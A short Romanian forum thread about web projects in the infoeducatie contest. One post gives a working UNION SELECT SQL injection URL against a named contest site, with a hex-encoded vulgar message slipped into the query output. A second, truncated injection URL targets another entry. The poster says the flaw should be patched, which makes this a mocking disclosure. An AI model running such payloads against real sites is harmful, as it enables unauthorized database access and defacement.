Ce e asta?

http://euro-trip.web2010.infoeducatie.ro/detailsint.php?action=descriere&id=-26%20union%20select%201,0x5468654a756467657220766f207472616765206c61206d7569652064652070652050616c6d2042656163682c2043616e6e657320212121,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34–&table=intern

TheJudger e un fost participant infoeducatie. Anu trecut si-a facut ultima data aparitia pe aici. :smile:)

:confused: hm nu stiu ce e, iar eu nu gasesc in baza de date aia :confused:

“aia” se numeste SQL Injection si v-a fost prezentata de domnul Sabin Buraga in seminariul “Vulnerabilitatile aplicatiilor Web” de la care se pare ca ati lipsit. Surprinzator este faptul ca comisia nu a sesizat aceasta vulnerabilitate care ar fi indicat sa fie patchuita pentru pastrarea integritatii site-ului si repesctiv a server-ului. Daca eram “bied buoi” puteam sa fac ravagii pe acolo dar dupa cum bine observati este doar un mesaj care se afiseaza direct din link de aceea nu apare in baza de date.

Bafta in continuare si sper ca in anii urmatori sa nu mai vad astfel de vulnerabilitati puerile la un concurs de renume ca acesta.

altu : http://autohybridpro.web2010.infoeducat … 70743e,3–

bai frate puneti mana pe carte…